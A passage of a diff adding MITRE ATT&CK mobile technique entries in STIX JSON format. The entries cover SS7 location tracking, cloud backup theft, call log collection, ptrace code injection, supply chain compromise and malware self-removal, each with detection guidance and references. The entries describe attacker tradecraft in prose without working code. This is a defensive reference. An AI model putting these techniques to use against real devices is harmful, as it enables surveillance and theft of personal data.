"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--0bcc4ec1-a897-49a9-a9ff-c00df1d1209d", + "type": "attack-pattern", + "created": "2017-10-25T14:48:08.155Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1454", + "external_id": "T1454" + } + ], + "modified": "2019-04-29T19:35:30.985Z", + "name": "Malicious SMS Message", + "description": "Test", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_version": "1.0", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--0c71033e-401e-4b97-9309-7a7c95e43a5d", + "created": "2017-10-25T14:48:18.237Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1470", + "url": "https://attack.mitre.org/techniques/T1470" + }, + { + "source_name": "Elcomsoft-EPPB", + "url": "https://www.elcomsoft.com/eppb.html", + "description": "Elcomsoft. (n.d.). Elcomsoft Phone Breaker. Retrieved December 29, 2016." + }, + { + "source_name": "Elcomsoft-WhatsApp", + "url": "https://blog.elcomsoft.com/2017/07/extract-and-decrypt-whatsapp-backups-from-icloud/", + "description": "Oleg Afonin. (2017, July 20). Extract and Decrypt WhatsApp Backups from iCloud. Retrieved July 6, 2018." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-1" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google's Android backup service or Apple's iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple's iCloud (Citation: Elcomsoft-EPPB). Elcomsoft also describes (Citation: Elcomsoft-WhatsApp) obtaining WhatsApp communication histories from backups stored in iCloud.", + "modified": "2022-04-06T15:54:11.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain Device Cloud Backups", + "x_mitre_detection": "Google provides the ability for users to view their account activity. Apple iCloud also provides notifications to users of account activity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "remote-service-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:43:03.218Z", + "name": "Uninstall Malicious Application", + "description": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by: \n \n* Abusing device owner permissions to perform silent uninstallation using device owner API calls. \n* Abusing root permissions to delete files from the filesystem. \n* Abusing the accessibility service. This requires sending an intent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can see a list of applications that can use accessibility services in the device settings. Application vetting services could look for use of the accessibility service or features that typically require root access.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "created": "2022-03-30T19:31:31.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630/001", + "external_id": "T1630.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:42:18.121Z", + "name": "Indicator Removal on Host", + "description": "Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can detect which applications can request device administrator permissions. Users can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. Users can see a list of applications that can use accessibility services in the device settings. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "created": "2022-03-30T19:28:25.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1630", + "external_id": "T1630" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-43.html", + "external_id": "APP-43" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:52:29.947Z", + "name": "Supply Chain Compromise", + "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images\n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency, specifically with the widespread usage of third-party advertising libraries.(Citation: Grace-Advertisement)(Citation: NowSecure-RemoteCode)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Usage of insecure or malicious third-party libraries could be detected by application vetting services. Malicious software development tools could be detected by enterprises that deploy endpoint protection software on computers that are used to develop mobile apps. Application vetting could detect the usage of insecure or malicious third-party libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474", + "external_id": "T1474" + }, + { + "source_name": "Grace-Advertisement", + "description": "M. Grace et al. (2012, April 16-18). Unsafe exposure analysis of mobile in-app advertisements. Retrieved December 22, 2016.", + "url": "https://www.csc2.ncsu.edu/faculty/xjiang4/pubs/WISEC12_ADRISK.pdf" + }, + { + "source_name": "NowSecure-RemoteCode", + "description": "Ryan Welton. (2015, June 15). A Pattern for Remote Code Execution using Arbitrary File Writes and MultiDex Applications. Retrieved December 22, 2016.", + "url": "https://www.nowsecure.com/blog/2015/06/15/a-pattern-for-remote-code-execution-using-arbitrary-file-writes-and-multidex-applications/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-6.html", + "external_id": "APP-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-0.html", + "external_id": "SPC-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html", + "external_id": "SPC-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html", + "external_id": "SPC-2" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-3.html", + "external_id": "SPC-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html", + "external_id": "SPC-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html", + "external_id": "SPC-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html", + "external_id": "SPC-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html", + "external_id": "SPC-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-9.html", + "external_id": "SPC-9" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-10.html", + "external_id": "SPC-10" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-11.html", + "external_id": "SPC-11" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-12.html", + "external_id": "SPC-12" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html", + "external_id": "SPC-13" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-14.html", + "external_id": "SPC-14" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-15.html", + "external_id": "SPC-15" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html", + "external_id": "SPC-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html", + "external_id": "SPC-17" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-18.html", + "external_id": "SPC-18" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-19.html", + "external_id": "SPC-19" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-20.html", + "external_id": "SPC-20" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html", + "external_id": "SPC-21" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:41:45.256Z", + "name": "Impersonate SS7 Nodes", + "description": "Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) \n\n \n\nBy providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC-WG1-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "created": "2022-04-05T19:49:58.938Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1430/002", + "external_id": "T1430.002" + }, + { + "source_name": "3GPP-Security", + "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.", + "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf" + }, + { + "source_name": "CSRIC5-WG10-FinalReport", + "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.", + "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf" + }, + { + "source_name": "CSRIC-WG1-FinalReport", + "description": "CSRIC-WG1-FinalReport" + }, + { + "source_name": "Positive-SS7", + "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.", + "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf" + }, + { + "source_name": "Engel-SS7-2008", + "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.", + "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI" + }, + { + "source_name": "Engel-SS7", + "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.", + "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html", + "external_id": "CEL-38" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799", + "type": "attack-pattern", + "created": "2017-10-25T14:48:30.462Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1425", + "external_id": "T1425" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "Insecure Third-Party Libraries", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:56:20.270Z", + "name": "Protected User Data", + "description": "Adversaries may utilize standard operating system APIs to collect data from permission-backed data stores on a device, such as the calendar or contact list. These permissions need to be declared ahead of time. On Android, they must be included in the application’s manifest. On iOS, they must be included in the application’s `Info.plist` file. \n\n \n\nIn almost all cases, the user is required to grant access to the data store that the application is trying to access. In recent OS versions, vendors have introduced additional privacy controls for users, such as the ability to grant permission to an application only while the application is being actively used by the user. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [Protected User Data](https://attack.mitre.org/techniques/T1636) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view permissions granted to an application in device settings. Application vetting services typically flag permissions requested by an application, which can be reviewed by an administrator. Certain dangerous permissions, such as `RECEIVE_SMS`, could receive additional scrutiny.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--11c2c2b7-1fd4-408f-bc2e-fe772ef9df5e", + "created": "2022-04-01T12:36:41.507Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636", + "external_id": "T1636" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "created": "2022-04-05T20:15:43.636Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.002", + "url": "https://attack.mitre.org/techniques/T1521/002" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private that should not be distributed. Due to how asymmetric algorithms work, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA, ElGamal, and ECDSA.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1521/002).", + "modified": "2022-04-05T20:16:21.324Z", + "name": "Asymmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:03.477Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempts specific actions. \n\n \n\nAdversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "created": "2017-10-25T14:48:28.067Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418", + "external_id": "T1418" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:23.702Z", + "name": "Process Discovery", + "description": "Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. \n\n \n\nRecent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the `hidepid` mount feature. Prior to Android 7, applications could utilize the `ps` command or examine the `/proc` directory on the device.(Citation: Android-SELinuxChanges) \n\n \n\nIn iOS, applications have previously been able to use the `sysctl` command to obtain a list of running processes. This functionality has been removed in later iOS versions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of `ps` or inspection of the `/proc` directory.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "created": "2017-10-25T14:48:33.926Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1424", + "external_id": "T1424" + }, + { + "source_name": "Android-SELinuxChanges", + "description": "Various. (2016, March 31). Overly restrictive SELinux filesystem permissions in Android N. Retrieved December 21, 2016.", + "url": "https://code.google.com/p/android/issues/detail?id=205565" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:32:30.150Z", + "name": "Call Log", + "description": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_CALL_LOG` in an Android application’s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "created": "2022-04-01T13:12:23.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/002", + "external_id": "T1636.002" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:55:33.642Z", + "name": "Security Software Discovery", + "description": "Adversaries may attempt to get a listing of security applications and configurations that are installed on a device. This may include things such as mobile security products. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1418/001) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "discovery" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for the Android permission `android.permission.QUERY_ALL_PACKAGES`, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API `LSApplicationWorkspace` and apply extra scrutiny to applications that employ it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "created": "2022-03-31T19:50:45.752Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1418/001", + "external_id": "T1418.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "external_id": "APP-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--1f96d624-8409-4472-ad8a-30618ee6b2e2", + "type": "attack-pattern", + "created": "2017-10-25T14:48:10.699Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1434", + "external_id": "T1434" + } + ], + "modified": "2018-10-17T01:05:10.699Z", + "name": "App Delivered via Email Attachment", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:57:40.571Z", + "name": "Ptrace System Calls", + "description": "Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPtrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (e.g., by using `malloc`) then invoking that memory with `PTRACE_SETREGS` to set the register containing the next instruction to execute. Ptrace system call injection can also be done with `PTRACE_POKETEXT`/`PTRACE_POKEDATA`, which copy data to a specific address in the target process's memory (e.g., the current address of the next instruction).(Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) \n\nPtrace system call injection may not be possible when targeting processes with high-privileges, and on some systems those that are non-child processes.(Citation: BH Linux Inject) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution 